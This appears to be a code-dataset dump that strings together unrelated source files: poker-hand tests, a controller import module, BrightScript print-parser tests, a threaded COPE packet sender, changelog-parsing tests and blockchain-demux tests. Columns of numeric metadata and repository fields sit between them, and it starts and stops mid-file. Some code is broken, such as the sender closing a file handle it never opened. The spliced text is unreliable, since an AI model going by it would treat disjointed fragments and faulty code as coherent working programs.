factory.make_card(6, card_games.Suit.Spades),
factory.make_card(7, card_games.Suit.Spades),
]
hand = factory.make_hand(*cards)
assert hand.scoring() == [card_games.PokerTrick.Three]
def test_poker_hand_22():
factory = card_games.PokerFactory()
cards = [
factory.make_card(5, card_games.Suit.Clubs),
factory.make_card(5, card_games.Suit.Diamonds),
factory.make_card(6, card_games.Suit.Hearts),
factory.make_card(6, card_games.Suit.Spades),
factory.make_card(7, card_games.Suit.Spades),
]
hand = factory.make_hand(*cards)
assert hand.scoring() == [card_games.PokerTrick.TwoPair]
def test_poker_hand_2():
factory = card_games.PokerFactory()
cards = [
factory.make_card(5, card_games.Suit.Clubs),
factory.make_card(5, card_games.Suit.Diamonds),
factory.make_card(6, card_games.Suit.Hearts),
factory.make_card(7, card_games.Suit.Spades),
factory.make_card(8, card_games.Suit.Clubs),
]
hand = factory.make_hand(*cards)
assert hand.scoring() == [card_games.PokerTrick.Pair]
def test_poker_hand_nothing():
factory = card_games.PokerFactory()
cards = [
factory.make_card(3, card_games.Suit.Clubs),
factory.make_card(5, card_games.Suit.Diamonds),
factory.make_card(7, card_games.Suit.Hearts),
factory.make_card(9, card_games.Suit.Spades),
factory.make_card(11, card_games.Suit.Clubs),
]
hand = factory.make_hand(*cards)
assert hand.scoring() == []
| 36.510345
| 66
| 0.68266
| 695
| 5,294
| 4.94964
| 0.089209
| 0.219767
| 0.218023
| 0.125581
| 0.882558
| 0.882558
| 0.882558
| 0.856977
| 0.827616
| 0.815116
| 0
| 0.014554
| 0.195315
| 5,294
| 144
| 67
| 36.763889
| 0.792958
| 0.0153
| 0
| 0.674419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077519
| 1
| 0.077519
| false
| 0
| 0.015504
| 0
| 0.093023
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fae5b1b2b27215f24c172ee008794bdc02fbb184
| 556
|
py
|
Python
|
Backend/autonomus/controllers/__init__.py
|
IrinaMBejan/Autonom
|
4a97da1b26ed22e3ec8bb939359148765392b692
|
[
"MIT"
] | 2
|
2019-03-08T10:04:35.000Z
|
2020-03-14T15:24:56.000Z
|
Backend/autonomus/controllers/__init__.py
|
IrinaMBejan/Autonom
|
4a97da1b26ed22e3ec8bb939359148765392b692
|
[
"MIT"
] | null | null | null |
Backend/autonomus/controllers/__init__.py
|
IrinaMBejan/Autonom
|
4a97da1b26ed22e3ec8bb939359148765392b692
|
[
"MIT"
] | 2
|
2019-03-16T14:47:36.000Z
|
2020-04-28T14:09:45.000Z
|
from .events_controller import get_all_events, get_event, update_event
from .tags_controller import add_tag, get_all_tags, get_tag
from .users_controller import Roles, remove_token, add_tag_to_user
from .users_controller import add_user, exists_user, get_user_role, get_users
from .users_controller import generate_token, update_token, verify_token
from .users_controller import add_event_to_user, remove_event_from_user
from .users_controller import remove_tag_from_user, get_user_events, get_user_tags
from .events_controller import get_events_next_days
| 61.777778
| 82
| 0.877698
| 90
| 556
| 4.933333
| 0.255556
| 0.288288
| 0.213964
| 0.281532
| 0.331081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082734
| 556
| 8
| 83
| 69.5
| 0.870588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
faeb64836f99f68c680034bf6e6433eb18d8540e
| 3,620
|
py
|
Python
|
tests/parse_tests/statement_reduction_tests/question_mark_parse_test.py
|
alexmakii/bslint
|
0795467166ca10c362fecc12ac17765cb85b659b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/parse_tests/statement_reduction_tests/question_mark_parse_test.py
|
alexmakii/bslint
|
0795467166ca10c362fecc12ac17765cb85b659b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/parse_tests/statement_reduction_tests/question_mark_parse_test.py
|
alexmakii/bslint
|
0795467166ca10c362fecc12ac17765cb85b659b
|
[
"BSD-3-Clause"
] | 1
|
2017-04-12T09:39:54.000Z
|
2017-04-12T09:39:54.000Z
|
import unittest
import bslint.constants as const
from tests.resources.common.test_methods import CommonMethods as Common
class TestQuestionMarkParse(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.common = Common()
def test_question_mark_value(self):
self.common.match_statement(const.PRINT_STMT, "print 4")
def test_question_mark_id(self):
self.common.match_statement(const.PRINT_STMT, "? x")
def test_question_mark_var_as(self):
self.common.match_statement(const.PRINT_STMT, "? x = 3")
def test_question_mark_function_call(self):
self.common.match_statement(const.PRINT_STMT, "? x()")
def test_question_mark_idoperator_value(self):
self.common.match_statement(const.PRINT_STMT, "? x^5")
def test_question_mark_value_comma_value(self):
self.common.match_statement(const.PRINT_STMT, "? 3,4")
def test_question_mark_value_comma_id(self):
self.common.match_statement(const.PRINT_STMT, "? 3,d")
def test_question_mark_value_comma_function_call(self):
self.common.match_statement(const.PRINT_STMT, "? 3,x()")
def test_question_mark_value_comma_variable_assignment(self):
self.common.match_statement(const.PRINT_STMT, "? 3,x=4")
def test_question_mark_value_comma_argument(self):
self.common.match_statement(const.PRINT_STMT, "? 3,3,4")
def test_question_mark_variable_assignment_comma_function_call(self):
self.common.match_statement(const.PRINT_STMT, "? Y=4,x()")
def test_question_mark_variable_assignment_comma_variable_assignment(self):
self.common.match_statement(const.PRINT_STMT, "? Y=4,x=4")
def test_question_mark_variable_assignment_comma_argument(self):
self.common.match_statement(const.PRINT_STMT, "? x=1,4,4")
def test_question_mark_value_semi_colon_value(self):
self.common.match_statement(const.PRINT_STMT, "? 3;4")
def test_question_mark_value_semi_colon_id(self):
self.common.match_statement(const.PRINT_STMT, "? 3;d")
def test_question_mark_value_semi_colon_function_call(self):
self.common.match_statement(const.PRINT_STMT, "? 3;x()")
def test_question_mark_value_semi_colon_variable_assignment(self):
self.common.match_statement(const.PRINT_STMT, "? 3;x=4")
def test_question_mark_value_semi_colon_argument(self):
self.common.match_statement(const.PRINT_STMT, "? 4;4,4")
def test_question_mark_idsemi_colon_value(self):
self.common.match_statement(const.PRINT_STMT, "? X;4")
def test_question_mark_idsemi_colon_id(self):
self.common.match_statement(const.PRINT_STMT, "? X;d")
def test_question_mark_idsemi_colon_function_call(self):
self.common.match_statement(const.PRINT_STMT, "? Y;x()")
def test_question_mark_idsemi_colon_variable_assignment(self):
self.common.match_statement(const.PRINT_STMT, "? Y;x=4")
def test_question_mark_idsemi_colon_argument(self):
self.common.match_statement(const.PRINT_STMT, "? x;4;4")
def test_question_mark_variable_assignment_semi_colon_variable_assignment(self):
self.common.match_statement(const.PRINT_STMT, "? Y=4;x=4")
def test_question_mark_variable_assignment_semi_colon_argument(self):
self.common.match_statement(const.PRINT_STMT, "? x=1;4;4")
def test_invalid_while_parenthesis(self):
self.common.status_error("? )")
def test_invalid_while_for(self):
self.common.status_error("? (for)")
def test_invalid_while_end_while(self):
self.common.status_error("? endwhile")
| 38.510638
| 84
| 0.741436
| 513
| 3,620
| 4.836257
| 0.107212
| 0.079
| 0.158001
| 0.191455
| 0.873841
| 0.827489
| 0.794841
| 0.76582
| 0.719871
| 0.667876
| 0
| 0.011692
| 0.149448
| 3,620
| 93
| 85
| 38.924731
| 0.794089
| 0
| 0
| 0
| 0
| 0
| 0.051105
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.460317
| false
| 0
| 0.047619
| 0
| 0.52381
| 0.015873
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
4f0aa28a4cd1aa1cc4db0528e47e9460b7856836
| 5,876
|
py
|
Python
|
mininet_dev/python_networking/traffic_generator_thread.py
|
dschoonwinkel/MininetNetworkHelp
|
48cddd94f84be3927c15926f1c046a99f36cefd2
|
[
"Apache-2.0"
] | null | null | null |
mininet_dev/python_networking/traffic_generator_thread.py
|
dschoonwinkel/MininetNetworkHelp
|
48cddd94f84be3927c15926f1c046a99f36cefd2
|
[
"Apache-2.0"
] | null | null | null |
mininet_dev/python_networking/traffic_generator_thread.py
|
dschoonwinkel/MininetNetworkHelp
|
48cddd94f84be3927c15926f1c046a99f36cefd2
|
[
"Apache-2.0"
] | null | null | null |
import cope_packet
import threading
import time
import coding_utils
import network_utils
import sys
interface = "eth0"
dest_ip = "10.0.0.1"
dest_hwaddr = "ff:ff:ff:ff:ff:ff"
def read_data_from_file(f1, payload_len):
data = f1.read(payload_len)
# coding_utils.print_hex("Hexdata", data)
return data
class COPE_sender(threading.Thread):
def __init__(self, name, src_ip, dest_ip, dest_hwaddr, interface):
threading.Thread.__init__(self)
self.name = name
self.src_ip = src_ip
self.dest_ip = dest_ip
self.dest_hwaddr = dest_hwaddr
self.interface = interface
def run(self):
# f1 = open("/home/osboxes/Development/NetworkCoding/mininet_dev/python_networking/trafficdump.bin", "r")
# COPE_payload = read_data_from_file(f1, 1470)
COPE_payload = str("Hello1")
# COPE_payload = "\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00"
# coding_utils.print_hex("Payload to send\n", COPE_payload)
print "Starting sender"
start_time = time.clock()
packets_to_send = 2
for i in range(packets_to_send):
cope_packet.send_COPE_packet(self.src_ip, self.dest_ip, self.dest_hwaddr, COPE_payload, self.interface)
# Apply CISCO, Motorola, Alcatel Lucent, Nokia, Qualcomm, Huawei,
end_time = time.clock()
print "Time took: %.20f" % (end_time - start_time)
f1.close()
print "%d COPE packets sent" % (packets_to_send)
def main():
global interface, dest_ip, dest_hwaddr
if len(sys.argv) >= 2:
interface = sys.argv[1]
if len(sys.argv) >= 3:
dest_ip = sys.argv[2]
if len(sys.argv) >= 4:
dest_hwaddr = sys.argv[3]
src_ip = network_utils.get_first_IPAddr()
sender = COPE_sender("COPE sender", src_ip, dest_ip, dest_hwaddr, interface)
sender.daemon = False
sender.start()
# try:
# while True:
# pass
# except KeyboardInterrupt:
# "Shutting down"
if __name__ == '__main__':
main()
| 83.942857
| 3,887
| 0.711198
| 1,236
| 5,876
| 3.317961
| 0.080906
| 0.705194
| 1.055596
| 1.407462
| 0.747135
| 0.719824
| 0.719824
| 0.705194
| 0.705194
| 0.705194
| 0
| 0.184412
| 0.087304
| 5,876
| 70
| 3,888
| 83.942857
| 0.580272
| 0.725664
| 0
| 0
| 0
| 0
| 0.065584
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.133333
| null | null | 0.066667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
877f072f9a12bdd37d7632c169cb719c2c71f387
| 4,049
|
py
|
Python
|
test/unit/extra/changelog/logic/test_extract_changelog_items.py
|
novopl/peltak
|
7c8ac44f994d923091a534870960fdae1e15e95e
|
[
"Apache-2.0"
] | 6
|
2015-09-10T13:20:34.000Z
|
2021-02-15T08:10:27.000Z
|
test/unit/extra/changelog/logic/test_extract_changelog_items.py
|
novopl/peltak
|
7c8ac44f994d923091a534870960fdae1e15e95e
|
[
"Apache-2.0"
] | 41
|
2015-09-09T12:44:55.000Z
|
2021-06-01T23:25:56.000Z
|
test/unit/extra/changelog/logic/test_extract_changelog_items.py
|
novopl/peltak
|
7c8ac44f994d923091a534870960fdae1e15e95e
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=missing-docstring
import pytest
from peltak.extra.changelog import logic
from peltak.extra.changelog.types import ChangelogTag
from peltak import testing
@pytest.mark.parametrize('header,tag', [
('Features', 'feature'),
('Changes', 'change'),
('Fixes', 'fix'),
])
@testing.patch_pelconf({})
def test_detects_each_tag(header, tag):
desc = '\n'.join([
'({tag}) This is my item'.format(tag=tag),
'and it has multiple lines',
])
items = logic.extract_changelog_items(desc, tags=[
ChangelogTag(header='Features', tag='feature'),
ChangelogTag(header='Changes', tag='change'),
ChangelogTag(header='Fixes', tag='fix'),
])
assert len(items[header]) == 1
assert items[header][0] == 'This is my item and it has multiple lines'
@pytest.mark.parametrize('header,tag', [
('Features', 'feature'),
('Changes', 'change'),
('Fixes', 'fix'),
])
@testing.patch_pelconf({})
def test_supports_dense_descriptions(header, tag):
desc = '\n'.join([
'({tag}) This is my item'.format(tag=tag),
'and it has multiple lines',
'({tag}) This is my second item'.format(tag=tag),
])
items = logic.extract_changelog_items(desc, tags=[
ChangelogTag(header='Features', tag='feature'),
ChangelogTag(header='Changes', tag='change'),
ChangelogTag(header='Fixes', tag='fix'),
])
assert len(items[header]) == 2
assert items[header][0] == 'This is my item and it has multiple lines'
assert items[header][1] == 'This is my second item'
@pytest.mark.parametrize('header,tag', [
('Features', 'feature'),
('Changes', 'change'),
('Fixes', 'fix'),
])
@testing.patch_pelconf({})
def test_supports_loose_descriptions(header, tag):
desc = '\n'.join([
'',
'({tag}) This is my item'.format(tag=tag),
'and it has multiple lines',
'',
'({tag}) This is my second item'.format(tag=tag),
])
items = logic.extract_changelog_items(desc, tags=[
ChangelogTag(header='Features', tag='feature'),
ChangelogTag(header='Changes', tag='change'),
ChangelogTag(header='Fixes', tag='fix'),
])
assert len(items[header]) == 2
assert items[header][0] == 'This is my item and it has multiple lines'
assert items[header][1] == 'This is my second item'
@testing.patch_pelconf({})
def test_supports_all_tags_used_together():
desc = '\n'.join([
'(fix) This is my fix',
'and it has multiple lines',
'',
'(change) This is my change',
'(feature) This is my feature',
])
items = logic.extract_changelog_items(desc, tags=[
ChangelogTag(header='Features', tag='feature'),
ChangelogTag(header='Changes', tag='change'),
ChangelogTag(header='Fixes', tag='fix'),
])
assert len(items['Features']) == 1
assert items['Features'][0] == 'This is my feature'
assert len(items['Changes']) == 1
assert items['Changes'][0] == 'This is my change'
assert len(items['Fixes']) == 1
assert items['Fixes'][0] == 'This is my fix and it has multiple lines'
@testing.patch_pelconf({})
def test_ignores_non_tagged_text():
desc = '\n'.join([
'This is some text that should be gnored',
'(feature) This is my feature',
'',
'This also should be ignored'
])
items = logic.extract_changelog_items(desc, tags=[
ChangelogTag(header='Features', tag='feature'),
])
assert len(items['Features']) == 1
assert items['Features'][0] == 'This is my feature'
@testing.patch_pelconf({})
def test_support_continuation_tags():
desc = '\n'.join([
'(feature) This is my item',
'',
'(_more) and it has a continuation tag.',
])
items = logic.extract_changelog_items(desc, tags=[
ChangelogTag(header='Features', tag='feature'),
])
assert len(items['Features']) == 1
assert items['Features'][0] == 'This is my item\nand it has a continuation tag.'
| 29.34058
| 84
| 0.611509
| 498
| 4,049
| 4.891566
| 0.150602
| 0.051724
| 0.065681
| 0.039409
| 0.811166
| 0.754105
| 0.740148
| 0.740148
| 0.740148
| 0.713875
| 0
| 0.005702
| 0.220301
| 4,049
| 137
| 85
| 29.554745
| 0.765917
| 0.00815
| 0
| 0.798165
| 0
| 0
| 0.289736
| 0
| 0
| 0
| 0
| 0
| 0.165138
| 1
| 0.055046
| false
| 0
| 0.036697
| 0
| 0.091743
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87a90597fb6ddd76a5c46f1b0496556057c532df
| 19,293
|
py
|
Python
|
tests/test_pydemux.py
|
blockrepublictech/py-demux-eos
|
7877bc960dcdea966b4d5a4bbe6392bd8c2bc253
|
[
"Apache-2.0"
] | 4
|
2018-12-07T20:50:56.000Z
|
2019-02-21T14:37:29.000Z
|
tests/test_pydemux.py
|
blockrepublictech/py-demux-eos
|
7877bc960dcdea966b4d5a4bbe6392bd8c2bc253
|
[
"Apache-2.0"
] | 2
|
2018-12-11T03:21:31.000Z
|
2018-12-11T05:41:48.000Z
|
tests/test_pydemux.py
|
blockrepublictech/py-demux-eos
|
7877bc960dcdea966b4d5a4bbe6392bd8c2bc253
|
[
"Apache-2.0"
] | null | null | null |
# py-demux-eos - Deterministic event-sourced state and side effect handling for blockchain applications
# Copyright (C) 2018 BlockRepublic Pty Ltd
# Licenced under the Apache 2.0 Licence
import unittest
import pytest
from unittest.mock import Mock, patch, call
from demuxeos import Demux
from demuxeos.exceptions import UnknownBlockError
from tests.utils import (block_1, fake_block1, fake_block2, block_9999,
block_10000, fake_block_10000)
from collections import defaultdict
# Tests for py-demux
class TestPyDemux(unittest.TestCase):
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_block_with_no_transactions(self, mock_get_info_head_block, mock_get_block):
"""
Ensure we can process a block with no transactions251
"""
mock_get_info_head_block.return_value = {'head_block_num': 99999999999}
# get_block returns manual block_1
mock_get_block.return_value = block_1
# mock callback functions
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock block_1
d.process_block(1)
# assertions
mock_get_block.assert_called_once()
mock_get_block.assert_called_with(1)
mock_start_block.assert_called_once()
assert mock_action.call_count == 0
mock_commit_block.assert_called_once()
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_single_mock_block_processing(self, mock_get_info_head_block, mock_get_block): #put get_info first
"""
Tests block processing on a mocked block
"""
mock_get_info_head_block.return_value = {'head_block_num': 99999999999}
# get_block returns fake_block1
mock_get_block.return_value = fake_block1
# mock callback functions
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock block fake_block1
d.process_block(100)
# assertions
mock_get_block.assert_called_once()
mock_get_block.assert_called_with(100)
mock_start_block.assert_called_once()
assert mock_action.call_count == 1
mock_commit_block.assert_called_once()
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_multiple_mock_block_processing(self, mock_get_info_head_block, mock_get_block):
"""
Ensures multiple block are processed given a start and end block
"""
mock_get_info_head_block.return_value = {'head_block_num': 99999999999}
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [fake_block1, fake_block2]
# mock callback functions
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock blocks 9999 to 10000
d.process_blocks(100, 102)
# assertions
assert mock_get_block.call_count == 2
assert mock_get_block.call_args_list == [call(100), call(101)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 3
assert mock_commit_block.call_count == 2
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_cannot_process_past_head_block(self, mock_get_info_head_block, mock_get_block):
"""
Tests when the end block is more than one block greater than the head block, an assertion is raised and no block is processed
"""
with pytest.raises(AssertionError) as excinfo:
mock_get_info_head_block.return_value = {'head_block_num': 99}
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# attempts to process the mock blocks 9999998 to 10000000
d.process_blocks(100, 101)
mock_get_block.assert_not_called()
mock_start_block.assert_not_called()
mock_action.assert_not_called()
mock_commit_block.assert_not_called()
assert 'ERROR: End block is past head block.' in str(excinfo.value)
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_cannot_process_past_last_irreversible_block(self, mock_get_info_irr_block, mock_get_block):
"""
Tests when the end block is more than one block greater than the last irreversible block, an assertion is raised and no block is processed
"""
with pytest.raises(AssertionError) as excinfo:
mock_get_info_irr_block.return_value = {'last_irreversible_block_num': 99}
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# attempts to process the mock blocks 9999998 to 10000000
d.process_blocks(100, 101, irreversible_only=True)
mock_get_block.assert_not_called()
mock_start_block.assert_not_called()
mock_action.assert_not_called()
mock_commit_block.assert_not_called()
assert 'ERROR: End block is past last irreversible block.' in str(excinfo.value)
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_continuous_block_processing(self, mock_sleep,
mock_get_info_head_block,
mock_get_block):
"""
Test that continuous polling the block chain for new blocks works correctly
"""
# Internal implementation of get_info() which keeps head_block as var,
mock_get_info_head_block.side_effect = [{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900}]
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [block_9999, block_10000]
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock blocks 9999
with pytest.raises(StopIteration) as excinfo:
d.process_blocks(9999)
# assertions
assert mock_get_block.call_count == 2
assert mock_get_block.call_args_list == [call(9999), call(10000)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 28
assert mock_commit_block.call_count == 2
assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_irreversible_blocks_only(self, mock_sleep,
mock_get_info_head_block,
mock_get_block):
"""
Test that rollbacks are dealt with correctly when continously polling the block chain
"""
mock_get_info_head_block.side_effect = [{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900}]
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [block_9999, block_10000]
# mock callback functions
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock blocks 9999
with pytest.raises(StopIteration) as excinfo:
d.process_blocks(9999)
# assertions
assert mock_get_block.call_count == 2
assert mock_get_block.call_args_list == [call(9999), call(10000)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 28
assert mock_commit_block.call_count == 2
assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_unknown_block_causes_a_rollback(self, mock_sleep,
mock_get_info_head_block,
mock_get_block):
"""
Test that continuous polling the block chain for new blocks works correctly
"""
# Internal implementation of get_info() which keeps head_block as var,
mock_get_info_head_block.side_effect = [{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
